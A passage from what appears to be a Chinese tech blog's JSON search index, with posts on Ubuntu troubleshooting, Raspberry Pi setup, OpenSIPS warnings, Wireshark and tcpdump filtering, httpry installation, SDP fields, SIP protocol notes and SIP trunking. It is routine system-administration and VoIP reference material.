之前的感觉不是很好吗?\n你为什么要这么折腾呢?\n有一种鸟儿注定不会被关在牢笼里,因为它的每一片羽毛都闪耀着自由的光辉。\u0026ndash;《肖申克的救赎》\n改变,的确是让人不舒服的事情。\n说实话,刚开始在ubuntu上开发,连装个中文输入法都让我绝望的想要放弃。\n还好是IT行业,你路过的坑,肯定有前任踩过。\n说来有点搞笑,我在ubuntu上使用vscode时,居然感觉不习惯了。\n我不习惯写着写着代码,还要把手从键盘上移开,去寻找千里之行的鼠标,然后滑动、点击、一直不停歇\n然后我就切换回neovim。\n有人说:vim是跟得上思维速度的编辑器。只有真正使用过的人,才能理解这句话。\n当你每次想向上飞的时候,总会有更大的阻力。\n15. 最后的最后 我用的deepin 如果我只用终端,连上linux做开发,那么我最好的选择是ubuntu或者manjaro 但是我还是避免不了要用微信,腾讯会议等App,我又想用linux, 那最好的选择是deepin 可能是人老了,不想再折腾了\n","permalink":"https://wdd.js.org/posts/2022/10/ubuntu-tips/","summary":"1. 
ubuntu wine 微信中文乱码 修改文件 /opt/deepinwine/tools/run.sh /opt/deepinwine/tools/run_v2.sh 将WINE_CMD那行中加入LC_ALL=zh_CN.UTF-8\nWINE_CMD=\u0026#34;LC_ALL=zh_CN.UTF-8 deepin-wine\u0026#34; 参考 https://gitee.com/wszqkzqk/deepin-wine-for-ubuntu\n2. ubuntu 20.04 wine 微信 qq 截图时黑屏 之前截图都是好的,不知道为什么,今天截图时,点击了微信的截图按钮后,屏幕除了状态栏,都变成黑色的了。\n各种搜索引擎搜了一遍,没有发现解决方案。\n最后决定思考最近对系统做了什么变更,最近我好像给系统安装了新的主题,然后在登录时,选择了新的主题,而没有选择默认的ubuntu主题。\n在登录界面的右下角,有个按钮,点击之后,可以选择主题。\n最近我都是选择其他的主题,没有选择默认的ubuntu主题,然后我就注销之后,重新在登录时选择默认的ubuntu主题后,再次打开微信截图,功能恢复正常。\n所以说,既然选择ubuntu了,就没必要搞些花里胡哨的东西。ubuntu默认的主题挺好看的,而且支持自带主题的设置,就没必要再折腾了。\n3. [open] ubuntu 20.04 锁屏后 解锁屏幕非常慢 super + l可以用来锁屏,锁屏之后屏幕变成黑屏。\n黑屏之后,如果需要唤醒屏幕,可以随便在键盘上按键,去唤醒屏幕。但是这个唤醒的过程感觉很慢,基本上要随便按键接近十几秒,屏幕才能被点亮,网上搜了下,但是没有找到原因。\n但是有个解决办法,就是在黑屏状态下,不要随便输入,而要输入正确的密码,然后按回车键, 这样会快很多。\n也就是说,系统运行正常,可能是显示器的问题。\n4. ubuntu 20.04 xorg 高cpu 桌面卡死 sudo systemctl restart gdm 5. ubuntu 状态栏显示网速 sudo add-apt-repository ppa:fossfreedom/indicator-sysmonitor sudo apt-get install indicator-sysmonitor 在任务启动中选择System Monitor\n在配置中可以选择开机启动\n在高级中可以设置显示哪些列, 我只关心网速,所以只写了{net}\n6. 在命令行查看图片 实际上终端并不能显示图片,而是调用了外部的程序去显示图片。\neog 是 Eye Of Gnome 的缩写, 它其实是个图片查看器。","title":"Ubuntu 使用过程中遇到的问题以及解决方案"},{"content":"我已经装过几次树莓派的系统了,记录一些使用心得。\n1. 选择哪个版本 最好用无桌面版,无桌面版更加稳定。我之前用过几次桌面版,桌面版存在以下问题。\n使用偶尔感觉会卡 经常使用一天之后,第二天要重启系统。 2. 关于初始设置 默认的用户是 pi,默认的密码是raspberry 登录成功之后,sudo passwd pi 来修改pi用户的密码 登录之后,sudo passwd root 来设置root的用户密码 3. 开启ssh 远程登录服务 raspi-config 4. root用户ssh登录 默认树莓派是禁止使用root远程登录的,想要开启的话,需要编辑/etc/ssh/sshd_config文件,增加一行PermitRootLogin yes, 然后重启ssh服务\nvi /etc/ssh/sshd_config PermitRootLogin yes sudo systemctl restart ssh 5. 关于联网 联网有两个方案\n用网线连接,简单方便,但是有条线子,总会把桌面搞得很乱 使用wifi连接,简单方便 使用wifi连接,一种方式是编辑配置文件,这个比较麻烦。我建议使用树莓派提供的raspi-config命令来设置wifi。\n在命令行中输入:raspi-config, 可以看到如下界面\n按下箭头,选择NetWork Options,按回车确认 进入网络设置后,按下箭头,选择N2 Wi-fi 然后就很简单了,输入wifi名称和wifi密码,最好你的wifi名称是英文的,出现中文会很尴尬的。 6. 
如何找到树莓派的IP地址 某些情况下,树莓派在断电重启之后会获得新的IP地址。在没有显示器的情况下,如何找到树莓派的IP呢?\n树莓派的MAC地址是:b8:27:eb:6c 开头\n所以你只需要输入: arp -a 就会打印网络中的主机以及MAC地址,找以b8:27:eb:6c开头的,很可能就是树莓派。\n7. 设置清华镜像源 https://mirrors.tuna.tsinghua.edu.cn/help/raspbian/\n","permalink":"https://wdd.js.org/posts/2022/10/raspi-config/","summary":"我已经装过几次树莓派的系统了,记录一些使用心得。\n1. 选择哪个版本 最好用无桌面版,无桌面版更加稳定。我之前用过几次桌面版,桌面版存在以下问题。\n使用偶尔感觉会卡 经常使用一天之后,第二天要重启系统。 2. 关于初始设置 默认的用户是 pi,默认的密码是raspberry 登录成功之后,sudo passwd pi 来修改pi用户的密码 登录之后,sudo passwd root 来设置root的用户密码 3. 开启ssh 远程登录服务 raspi-config 4. root用户ssh登录 默认树莓派是禁止使用root远程登录的,想要开启的话,需要编辑/etc/ssh/sshd_config文件,增加一行PermitRootLogin yes, 然后重启ssh服务\nvi /etc/ssh/sshd_config PermitRootLogin yes sudo systemctl restart ssh 5. 关于联网 联网有两个方案\n用网线连接,简单方便,但是有条线子,总会把桌面搞得很乱 使用wifi连接,简单方便 使用wifi连接,一种方式是编辑配置文件,这个比较麻烦。我建议使用树莓派提供的raspi-config命令来设置wifi。\n在命令行中输入:raspi-config, 可以看到如下界面\n按下箭头,选择NetWork Options,按回车确认 进入网络设置后,按下箭头,选择N2 Wi-fi 然后就很简单了,输入wifi名称和wifi密码,最好你的wifi名称是英文的,出现中文会很尴尬的。 6. 如何找到树莓派的IP地址 某些情况下,树莓派在断电重启之后会获得新的IP地址。在没有显示器的情况下,如何找到树莓派的IP呢?\n树莓派的MAC地址是:b8:27:eb:6c 开头\n所以你只需要输入: arp -a 就会打印网络中的主机以及MAC地址,找以b8:27:eb:6c开头的,很可能就是树莓派。\n7. 设置清华镜像源 https://mirrors.tuna.tsinghua.edu.cn/help/raspbian/","title":"树莓派初始化配置"},{"content":" 可能和avp_db_query有关 https://opensips.org/pipermail/users/2018-October/040157.html What we found is that the warning go away if we comment out the single avp_db_query that is being used in our config.\n_ The avp_db_query is not executed at the start, but only when specific header is present. Yet the fooding start immediately after opensips start. The mere presence of the avp_db_query function in config without execution is enough to have the issue._\n可能和openssl库有关 https://github.com/OpenSIPS/opensips/issues/1771#issuecomment-517744489 Here are your results. I\u0026rsquo;m attaching the full backtrace (looks about the same) and the logs containing the memory debug. 
Please let me know if you need additional info.\n这个讨论很有价值 感觉和curl超时有关 https://github.com/OpenSIPS/opensips/issues/929 I checked with a tcpdump, and that http request was answered after 40ms, but opensips missed it. Another strange thing is that despite of the use of async, opensips does not process any other SIP request while waiting for this missing answer, I see because with default params, with 20s timeout, opensips didn\u0026rsquo;t process REGISTER request and SIP endpoints unregistered, this is the reason because I changed connection timeout to 1s.\nI\u0026rsquo;ve discovered that this issue occured only if http keepalive (tcp persistent connection) is enabled. I\u0026rsquo;ve simply added \u0026ldquo;KeepAlive Off\u0026rdquo; directive in httpd configuration and the problem stopped.\nI hope this info will be useful for debugging.\n使用opensipsctl trap 可以产生调用栈文件 WARNING:core:utimer_ticker: utimer task already scheduled for 8723371990 ms (now 8723387850 ms), it may overlap.\n参考资料 https://github.com/OpenSIPS/opensips/issues/1767 https://opensips.org/pipermail/users/2018-October/040151.html https://github.com/OpenSIPS/opensips/issues/2183 https://github.com/OpenSIPS/opensips/issues/1858 https://opensips.org/pipermail/users/2019-August/041454.html https://opensips.org/pipermail/users/2017-October/038209.html ","permalink":"https://wdd.js.org/opensips/ch1/utime-task-scheduled/","summary":"可能和avp_db_query有关 https://opensips.org/pipermail/users/2018-October/040157.html What we found is that the warning go away if we comment out the single avp_db_query that is being used in our config.\n_ The avp_db_query is not executed at the start, but only when specific header is present. Yet the fooding start immediately after opensips start. 
The mere presence of the avp_db_query function in config without execution is enough to have the issue._\n可能和openssl库有关 https://github.com/OpenSIPS/opensips/issues/1771#issuecomment-517744489 ere are your results.","title":"utimer task \u003ctm-utimer\u003e already scheduled"},{"content":"1. HTTP抓包例子 案例:本地向 http://192.168.40.134:31204/some-api,如何过滤?\nhttp and ip.addr == 192.168.40.134 and tcp.port == 31204 语句分析:\nhttp 表示我只需要http的包 ip.addr 表示只要源ip或者目标ip地址中包含192.168.40.134 tcp.port 表示只要源端口或者目标端口中包含31204 2. 为什么我写的表达式总是不对呢?😂 很多时候,你写的表达式背景色变成红色,说明表达式错误了,例如下图:http and ip.port == 31204\n写出ip.port这个语句,往往是对传输协议理解不清晰。😅\nip是网络层的协议,port是传输层tcp或者udp中使用的。例如你写tcp.port == 80,udp.port ==3000这样是没问题的。但是port不能跟在ip的后面,如果你不清楚怎么写,你可以选择wireshark的智能提示。\n智能提示会提示所有可用的表达式。\n3. 常用过滤表达式 一般我们的过滤都是基于协议,ip地址或者端口号进行过滤的,\n3.1. 基于协议的过滤 直接输入协议名进行过滤\n3.2. 基于IP地址的过滤 3.3. 基于端口的过滤 基于端口的过滤一般就两种\ntcp.port == xxx udp.port == xxx 3.4. 基于host的过滤 4. 比较运算符支持 == 等于 != 不等于 \u0026gt; 大于 \u0026lt; 小于 \u0026gt;= 大于等于 \u0026lt;= 小于等于 ip.addr == 192.168.2.4 5. 逻辑运算符 and 条件与 or 条件或 xor 仅能有一个条件为真 not 所有条件都不能为真 ip.addr == 192.168.2.4 and tcp.port == 2145 and !tcp.port == 3389 6. 只关心某些特殊的tcp包 tcp.flags.fin==1 只过滤关闭连接的包 tcp.flags.syn==1\t只过滤建立连接的包 tcp.flags.reset==1 只过滤出tcp连接重置的包 7. 统计模块 7.1. 查看有哪些IP Statistics -\u0026gt; endpoints\n7.2. 查看那些IP之间发生会话 Statistics -\u0026gt; Conversations\n7.3. 按照协议划分 8. 最后 在会使用上述四个过滤方式之后,就可以自由的扩展了\n🏄🏄🏄🏄🏄🏄 ⛹️‍♀️⛹️‍♀️⛹️‍♀️⛹️‍♀️⛹️‍♀️⛹️‍♀️ 🏋️🏋️🏋️🏋️🏋️🏋️\nhttp.request.method == GET # 基于http请求方式的过滤 ip.src == 192.168.1.4 ","permalink":"https://wdd.js.org/network/wireshark/","summary":"1. HTTP抓包例子 案例:本地向 http://192.168.40.134:31204/some-api,如何过滤?\nhttp and ip.addr == 192.168.40.134 and tcp.port == 31204 语句分析:\nhttp 表示我只需要http的包 ip.addr 表示只要源ip或者目标ip地址中包含192.168.40.134 tcp.port 表示只要源端口或者目标端口中包含31204 2. 
为什么我写的表达式总是不对呢?😂 很多时候,你写的表达式背景色变成红色,说明表达式错误了,例如下图:http and ip.port == 31204\n写出ip.port这个语句,往往是对传输协议理解不清晰。😅\nip是网络层的协议,port是传输层tcp或者udp中使用的。例如你写tcp.port == 80,udp.port ==3000这样是没问题的。但是port不能跟在ip的后面,如果你不清楚怎么写,你可以选择wireshark的智能提示。\n智能提示会提示所有可用的表达式。\n3. 常用过滤表达式 一般我们的过滤都是基于协议,ip地址或者端口号进行过滤的,\n3.1. 基于协议的过滤 直接输入协议名进行过滤\n3.2. 基于IP地址的过滤 3.3. 基于端口的过滤 基于端口的过滤一般就两种\ntcp.port == xxx udp.port == xxx 3.4. 基于host的过滤 4. 比较运算符支持 == 等于 != 不等于 \u0026gt; 大于 \u0026lt; 小于 \u0026gt;= 大于等于 \u0026lt;= 小于等于 ip.addr == 192.168.2.4 5. 逻辑运算符 and 条件与 or 条件或 xor 仅能有一个条件为真 not 所有条件都不能为真 ip.","title":"Wireshark抓包教程"},{"content":"查看帮助文档 从帮助文档可以看出,包过滤的表达式一定要放在最后一个参数\ntcpdump [ -AbdDefhHIJKlLnNOpqStuUvxX# ] [ -B buffer_size ] [ -c count ] [ --count ] [ -C file_size ] [ -E spi@ipaddr algo:secret,... ] [ -F file ] [ -G rotate_seconds ] [ -i interface ] [ --immediate-mode ] [ -j tstamp_type ] [ -m module ] [ -M secret ] [ --number ] [ --print ] [ -Q in|out|inout ] [ -r file ] [ -s snaplen ] [ -T type ] [ --version ] [ -V file ] [ -w file ] [ -W filecount ] [ -y datalinktype ] [ -z postrotate-command ] [ -Z user ] [ --time-stamp-precision=tstamp_precision ] [ --micro ] [ --nano ] [ expression ] 列出所有网卡 tcpdump -D 1.enp89s0 [Up, Running, Connected] 2.docker0 [Up, Running, Connected] 3.vetha051ecc [Up, Running, Connected] 4.vethe67e03a [Up, Running, Connected] 5.vethc58c174 [Up, Running, Connected] 指定网卡 -i tcpdump -i eth0 所有网卡 tcpdump -i any 不要域名解析 tcpdump -n -i any 指定主机 tcpdoump host 192.168.0.1 指定源IP或者目标IP # 根据源IP过滤 tcpdump src 192.168.3.2 # 根据目标IP过滤 tcpdump dst 192.168.3.2 指定协议过滤 tcpdump tcp 指定端口 # 根据某个端口过滤 tcpdomp port 33 # 根据源端口或者目标端口过滤 tcpdump dst port 33 tcpdump src port 33 # 根据端口范围过滤 tcpdump portrange 30-90 根据IP和地址 tcpdump -i ens33 tcp and host 192.168.40.30 抓包结果写文件 tcpdump -i ens33 tcp and host 192.168.40.30 -w log.pcap 每隔30秒写一个文件 -G 30 表示每隔30秒写一个文件 文件名中的%实际上是时间格式 tcpdump -i ens33 -G 30 tcp and host 192.168.40.30 -w %Y_%m%d_%H%M_%S.log.pcap 每达到30MB产生一个文件 -C 30 每达到30MB产生一个文件 tcpdump -i ens33 -C 30 
tcp and host 192.168.40.30 -w log.pcap 指定抓包的个数 在流量很大的网络上抓包,如果写文件的话,很可能将磁盘写满。所以最好指定一个最大的抓包个数,在达到包的个数后,自动退出。\ntcpdump -c 100000 -i eth0 host 21.23.3.2 -w test.pcap 抓包文件太大,切割成小包 把原来的包文件切割成20M大小的多个包\ntcpdump -r old_file -w new_files -C 20 按照包长大小过滤 # 包长小于某个值 tcpdump less 30 # 包长大于某个值 tcpdump greater 30 按照16进制的方式显示包的内容 BPF 过滤规则 port 53 src port 53 dest port 53 host 1.2.3.4 src host 1.2.3.4 dest host 1.2.3.4 host 1.2.3.4 and port 53 读取old.pcap文件 然后根据条件过滤 产生新的文件 适用于从一个大的pcap文件中过滤出需要的包\ntcpdump -r old.pcap -w new.pcap less 1280 最佳实践 1. 关注 packets dropped by kernel的值 有时候,抓包停止后,tcpdump打印xxx个包drop by kernel。一旦这个值不为零,就要注意了。某些包并不是在网络中丢包了,而是在tcpdump这个工具给丢弃了。\n60 packets captured 279514 packets received by filter 279368 packets dropped by kernel 默认情况下,tcpdump抓包时会做dns解析,这个dns解析会降低tcpdump的处理速度,造成tcpdump的buffer被填满,然后就被tcpdump丢弃。\n我们可以用两个方法解决这个问题\n-B 指定buffer的大小,默认单位为kb。例如-B 1024 -n -nn 设置tcpdump 不要解析host地址,不要抓换协议和端口号 -n Don\u0026#39;t convert host addresses to names. This can be used to avoid DNS lookups. -nn Don\u0026#39;t convert protocol and port numbers etc. to names either. -B buffer_size --buffer-size=buffer_size Set the operating system capture buffer size to buffer_size, in units of KiB (1024 bytes). 参考 https://serverfault.com/questions/131872/how-to-split-a-pcap-file-into-a-set-of-smaller-ones http://alumni.cs.ucr.edu/~marios/ethereal-tcpdump.pdf ethereal-tcpdump.pdf https://unix.stackexchange.com/questions/144794/why-would-the-kernel-drop-packets ","permalink":"https://wdd.js.org/network/tcpdump/","summary":"查看帮助文档 从帮助文档可以看出,包过滤的表达式一定要放在最后一个参数\ntcpdump [ -AbdDefhHIJKlLnNOpqStuUvxX# ] [ -B buffer_size ] [ -c count ] [ --count ] [ -C file_size ] [ -E spi@ipaddr algo:secret,... 
] [ -F file ] [ -G rotate_seconds ] [ -i interface ] [ --immediate-mode ] [ -j tstamp_type ] [ -m module ] [ -M secret ] [ --number ] [ --print ] [ -Q in|out|inout ] [ -r file ] [ -s snaplen ] [ -T type ] [ --version ] [ -V file ] [ -w file ] [ -W filecount ] [ -y datalinktype ] [ -z postrotate-command ] [ -Z user ] [ --time-stamp-precision=tstamp_precision ] [ --micro ] [ --nano ] [ expression ] 列出所有网卡 tcpdump -D 1.","title":"Tcpdump抓包教程"},{"content":"git clone https://gitee.com/nuannuande/httpry.git cd httpry yum install libpcap-devel -y make make install cp -f httpry /usr/sbin/ httpry -i eth0 ","permalink":"https://wdd.js.org/network/httpry/","summary":"git clone https://gitee.com/nuannuande/httpry.git cd httpry yum install libpcap-devel -y make make install cp -f httpry /usr/sbin/ httpry -i eth0 ","title":"http抓包工具httpry使用"},{"content":"1. 什么是SDP? SDP是Session Description Protocol的缩写,翻译过来就是会话描述协议,这个协议通常存储各种和媒体相关的信息,例如支持哪些媒体编码, 媒体端口是多少?媒体IP地址是多少之类的。\nSDP一般作为SIP消息的body部分。如下所示\nINVITE sip:bob@biloxi.example.com SIP/2.0 Via: SIP/2.0/TCP client.atlanta.example.com:5060;branch=z9hG4bK74bf9 Max-Forwards: 70 From: Alice \u0026lt;sip:alice@atlanta.example.com\u0026gt;;tag=9fxced76sl To: Bob \u0026lt;sip:bob@biloxi.example.com\u0026gt; Call-ID: 3848276298220188511@atlanta.example.com CSeq: 1 INVITE Contact: \u0026lt;sip:alice@client.atlanta.example.com;transport=tcp\u0026gt; Content-Type: application/sdp Content-Length: 151 v=0 o=alice 2890844526 2890844526 IN IP4 client.atlanta.example.com s=- c=IN IP4 192.0.2.101 t=0 0 m=audio 49172 RTP/AVP 0 a=rtpmap:0 PCMU/8000 刚开始我一直认为某些sip消息一定带有sdp,例如invite消息。某些sip请求一定没有携带sdp。\n实际上sip消息和sdp并没有硬性的附属关系。sip是用来传输信令的,sdp是用来描述媒体流信息的。\n如果信令不需要携带媒体流信息,就可以不用携带sdp。\n一般情况下,invite请求都会带有sdp信息,但是某些时候也会没有。例如3PCC(third party call control), 第三方呼叫控制,是指由第三方负责协商媒体信息。\n常见的一个场景\n2. SDP字段介绍 2.1. v= 版本号 当前sdp的版本号是0,所以常见的都是v=0\n2.2. 
o= 发起者id o=的格式\no=username session-id version network-type address-type address username: 登录的用户名或者主机host session-id: NTP时间戳 version: NTP时间戳 network-type: 一般是IN, 表示internet address-type: 表示地址类型,可以是IP4, IP6 2.3. c= 连接数据 c=的格式\nc=network-type address-type connection-address network-type: 一般是IN, 表示internet address-type: 地址类型 IP4, IP6 connection-address: 连接地址 2.4. m= 媒体信息 格式\nm=media port transport format-list media 媒体类型 audio 语音 video 视频 image 传真 port 端口号 transport 传输协议 format-list 格式 m=audio 49430 RTP/AVP 0 6 8 99 m=application 52341 udp wb 2.5. a= 扩展属性 2.6. 通用扩展 3. SDP中的RTP RTCP 信息 RTP的端口一般是偶数,例如下面的4002。RTCP是RTP端口下面的一个奇数,如4003。 RTP中传递的是媒体信息,RTCP是用于控制媒体信息传递的控制信令,流入丢包的数据。\nm=audio 4002 RTP/AVP 104 3 0 8 96 a=rtcp:4003 IN IP4 192.168.1.5 4. WebRTC中的RTP和RTCP端口 在WebRTC中,RTP和RTCP的端口一般是公用一个。 在INIVTE消息的SDP中会带有:\na=rtcp-mux 如果服务端同意公用一个端口,并且INVITE请求成功,那么在200 OK的SDP中可以看到下面的内容。 可以看到RTP和RTCP公用20512端口。\nm=audio 20512 RTP/SAVPF 0 8 101 a=rtcp:20512 a=rtcp-mux 5. 参考 https://www.ietf.org/rfc/rfc2327.txt ","permalink":"https://wdd.js.org/opensips/ch1/sip-with-sdp/","summary":"1. 什么是SDP? 
SDP是Session Description Protocol的缩写,翻译过来就是会话描述协议,这个协议通常存储各种和媒体相关的信息,例如支持哪些媒体编码, 媒体端口是多少?媒体IP地址是多少之类的。\nSDP一般作为SIP消息的body部分。如下所示\nINVITE sip:bob@biloxi.example.com SIP/2.0 Via: SIP/2.0/TCP client.atlanta.example.com:5060;branch=z9hG4bK74bf9 Max-Forwards: 70 From: Alice \u0026lt;sip:alice@atlanta.example.com\u0026gt;;tag=9fxced76sl To: Bob \u0026lt;sip:bob@biloxi.example.com\u0026gt; Call-ID: 3848276298220188511@atlanta.example.com CSeq: 1 INVITE Contact: \u0026lt;sip:alice@client.atlanta.example.com;transport=tcp\u0026gt; Content-Type: application/sdp Content-Length: 151 v=0 o=alice 2890844526 2890844526 IN IP4 client.atlanta.example.com s=- c=IN IP4 192.0.2.101 t=0 0 m=audio 49172 RTP/AVP 0 a=rtpmap:0 PCMU/8000 刚开始我一直认为某些sip消息一定带有sdp,例如invite消息。某些sip请求一定没有携带sdp。\n实际上sip消息和sdp并没有硬性的附属关系。sip是用来传输信令的,sdp是用来描述媒体流信息的。\n如果信令不需要携带媒体流信息,就可以不用携带sdp。\n一般情况下,invite请求都会带有sdp信息,但是某些时候也会没有。例如3PCC(third party call control), 第三方呼叫控制,是指由第三方负责协商媒体信息。\n常见的一个场景\n2. SDP字段介绍 2.1. v= 版本号 当前sdp的版本号是0,所以常见的都是v=0\n2.2. o= 发起者id o=的格式","title":"SIP和SDP的关系"},{"content":"1. sip协议由request-uri路由,而不是to字段 sip消息在经过ua发送出去时,request-uri可能会被重写,而to字段,一般是不变的\n2. 主叫生成callId和from tag, 响应to tag由另一方生成 totag的作用可以用来区分初始化请求和序列化请求\n3. sip消息有哪些头字段是必须的? Via Max-Forwards (请求消息必须有这个头,响应消息一般没有这个头) 感谢 @genmzy 提示。 From To Call-ID CSeq 4. 被叫在向主叫发消息时,from和to字段为什么没变? from和to字段用来表明sip 请求的方向,而不是sip消息的方向。主叫发起的请求,那么在这个dialog中,所有的sip消息,主叫和被叫字段都不会变。\n5. 为什么所有via头中的branch都以z9hG4bK开头 这个头是rfc3261中规定的,表示它是经过严格规则生成的,可以用来标记事务。\n6. sip有两种url, 是什么?有什么区别 用户uri: AOR address of record, 例如from和to字段中的url 设备uri: 例如 contact头 用户uri用来唯一认证用户,设备uri用来唯一认证设备。 用户uri往往需要查询数据库,而设备uri来自设备自己的网络地址,不需要查询数据库。 一个用户可能有多个设备 7. sip注册实际上绑定用户url和设备ip地址 我并不能直接联系你,我只能用我的手机拨打你的手机。\n8. 呼叫结束了,为什么呼叫的状态信息还需要维持一段时间? 重传的invite消息,可能包含相同的callId和cseq, 为了不影响到之后的呼叫,需要耗尽网络中重传的包。\n9. sip 网关是干什么的? 网关的两侧通信协议是不同的,网关负责将协议翻译成彼此可以理解的协议。sip网关也是如此。电话网络的通信协议不仅仅只有sip, 还有其他的各种信令,如七号信令,ISDN, ISUP, CAS等。\n10. 
sip结构组件 SIP User Agents Presence Agents B2B User Agents SIp Gateways SIP Server 代理服务器 注册服务器 重定向服务器 11. 代理服务器和UA与网关的区别? 代理服务器没有媒体处理能力 代理服务器不解析消息体,只解析消息头 代理服务器并不分发消息 12. 什么是Forking Proxy? Forking Proxy收到一个INVITE请求,却发出去多个INVITE来呼叫多个UA, 适用于多人会议。 13. SIP url有哪些形式? 下图是 sip url 参数列表: 比较重要的有\nlr ob transport 14. ACK请求的要点知识 只有INVITE需要ACK确认 2xx响应的ACK由主叫方产生 3xx, 4xx,5xx,6xx的ACK是逐跳的,并且一般是代理服务器产生 15. 可靠性的机制 重传 T1 T2 sip如果使用tcp, 那么tcp是自带重传的,不需要sip再做重传机制。如果使用udp, udp本身是没有可靠性的保证的。那么这就需要应用层去自己实现可靠性。\n请求在发送出去时,会启动定时器 重传在达到64T1, 呼叫宣布失败 16. ACK 消息 Cseq method会怎样改变? Cseq不变 method变为ACK 主叫方发送ack, 其中ack的CSeq序号和invite保持一致 17. 端到端的ACK和逐跳的ACK有什么区别 对200响应的ACK是端到端的,对非200的ACK是逐跳的 端到端的ACK是一个新的事务,有新的branchId 逐跳的ACK和上一个INVITE请求的branchId一致 当你收到ACK请求时,你要判断这个ACK是应当立即传递到下一跳,还是自己处理 18. 非INVITE请求的重传 消息发送出去时,启动定时器,周期为T1 如果定时器过期,则再启动定时器,周期为2T1, 周期2倍递增,如果周期到达T2, 则以后的重传周期都是T2 如果中间收到了1xx的消息,则计时器立即将周期设置为T2, 并在T2过期时再次重发 19. INVITE请求的重传 请求以2倍之前的周期执行重传 如果收到1xx的响应,则不会再重传 20. 端到端与逐跳的区别 21. cancel消息的特点 cancel是逐跳的 cancel的CSeq和branchId和上一个invite一致 一般的cancel请求处理图 22. Via的特点 请求在传递给下一站时,UA会在在最上面加上自己的Via头。 branch tag来自 from, to, callId, request-url的hash值 大多数sip头的顺序都是不重要的,但是Via的顺序决定了,响应应该送到哪里 如果请求不是来自Via头 23. 24 CSeq CSeq 会持续增长,有可能不会按1递增 同一个事务的CSeq是相同的 ACK的CSeq会和invite一致 ","permalink":"https://wdd.js.org/opensips/ch1/sip-notes/","summary":"1. sip协议由request-uri路由,而不是to字段 sip消息再经过ua发送出去时,request-uri可能会被重写,而to字段,一般是不变的\n2. 主叫生成callId和from tag, 响应to tag由另一方生成 totag的作用可以用来区分初始化请求和序列化请求\n3. sip消息有哪些头字段是必须的? Via Max-Forwards (请求消息必须有这个头,响应消息一般没有这个头) 感谢 @genmzy 提示。 From To Call-ID CSeq 4. 被叫在向主叫发消息时,from和to字段为什么没变? from和to字段用来表名sip 请求的方向,而不是sip消息的方向。主叫发起的请求,那么在这个dialog中,所有的sip消息,主叫和被叫字段都不会变。\n5. 为什么所有via头中的branch都以z9hG4bK开头 这个头是rfc3261中规定的,表示她是经过严格规则生成的,可以用来标记事务。\n6. sip有两种url, 是什么?有什么区别 用户uri: AOR address of record, 例如from和to字段中的url 设备uri: 例如 contact头 用户uri用来唯一认证用户,设备uri用来唯一认证设备。 用户uri往往需要查询数据库,而设备uri来自设备自己的网络地址,不需要查询数据库。 一个用户可能有多个设备 7. sip注册实际上绑定用户url和设备ip地址 我并不能直接联系你,我只能用我的手机拨打你的手机。\n8. 呼叫结束了,为什么呼叫的状态信息还需要维持一段时间? 
重传的invite消息,可能包含相同的callId和cseq, 为了不影响到之后的呼叫,需要耗尽网络中重传的包。\n9. sip 网关是干什么的? 网关的两侧通信协议是不同的,网关负责将协议翻译成彼此可以理解的协议。sip网关也是如此。电话网络的通信协议不仅仅只有sip, 还有其他的各种信令,如七号信令,ISDN, ISUP, CAS等。\n10. sip结构组件 SIP User Agents Presence Agents B2B User Agents SIp Gateways SIP Server 代理服务器 注册服务器 重定向服务器 11.","title":"SIP协议拾遗补缺"},{"content":"传统中继 sip trunk中继 安全可靠:SIP Trunk设备和ITSP之间只需建立唯一的、安全的、具有QoS保证的SIP Trunk链路。通过该链路来承载企业的多路并发呼叫,运营商只需对该链路进行鉴权,不再对承载于该链路上的每一路SIP呼叫进行鉴权。 节约硬件成本:企业内部通信由企业IP-PBX负责。企业所有外出通信都通过SIP Trunk交由ITSP,再由ITSP中的设备发送到PSTN网络,企业不再需要维护原有的传统PSTN中继链路,节省了硬件和维护成本。 节约话费成本:企业可以通过设置目的地址任意选择并连接到多个ITSP,充分利用遍布全球各地的ITSP,节省通话费用。 功能强大:部署SIP Trunk设备后,全网可以使用SIP协议,可以更好的支持语音、会议、即时消息等IP通信业务。 处理信令和媒体:SIP Trunk设备不同于SIP代理服务器。SIP Trunk设备接收到用户的呼叫请求后,会代表用户向ITSP发起新呼叫请求。在转发过程中,SIP Trunk设备不但要对信令消息进行中继转发,对RTP媒体消息也需要进行中继转发。在整个过程中,SIP Trunk设备两端的设备(企业内部和企业外部设备)均认为和其交互的是SIP Trunk设备本身。 参考 http://www.h3c.com/cn/d_201009/688762_30003_0.htm https://getvoip.com/blog/2013/01/24/differences-between-sip-trunking-and-hosted-pbx/ https://www.onsip.com/blog/hosted-pbx-vs-sip-trunking https://baike.baidu.com/item/sip%20trunk/1499860 ","permalink":"https://wdd.js.org/opensips/ch1/trunk-pbx-gateway/","summary":"传统中继 sip trunk中继 安全可靠:SIP Trunk设备和ITSP之间只需建立唯一的、安全的、具有QoS保证的SIP Trunk链路。通过该链路来承载企业的多路并发呼叫,运营商只需对该链路进行鉴权,不再对承载于该链路上的每一路SIP呼叫进行鉴权。 节约硬件成本:企业内部通信由企业IP-PBX负责。企业所有外出通信都通过SIP Trunk交由ITSP,再由ITSP中的设备发送到PSTN网络,企业不再需要维护原有的传统PSTN中继链路,节省了硬件和维护成本。 节约话费成本:企业可以通过设置目的地址任意选择并连接到多个ITSP,充分利用遍布全球各地的ITSP,节省通话费用。 功能强大:部署SIP Trunk设备后,全网可以使用SIP协议,可以更好的支持语音、会议、即时消息等IP通信业务。 处理信令和媒体:SIP Trunk设备不同于SIP代理服务器。SIP Trunk设备接收到用户的呼叫请求后,会代表用户向ITSP发起新呼叫请求。在转发过程中,SIP Trunk设备不但要对信令消息进行中继转发,对RTP媒体消息也需要进行中继转发。在整个过程中,SIP Trunk设备两端的设备(企业内部和企业外部设备)均认为和其交互的是SIP Trunk设备本身。 参考 http://www.h3c.com/cn/d_201009/688762_30003_0.htm https://getvoip.com/blog/2013/01/24/differences-between-sip-trunking-and-hosted-pbx/ https://www.onsip.com/blog/hosted-pbx-vs-sip-trunking https://baike.baidu.com/item/sip%20trunk/1499860 ","title":"Trunk Pbx 
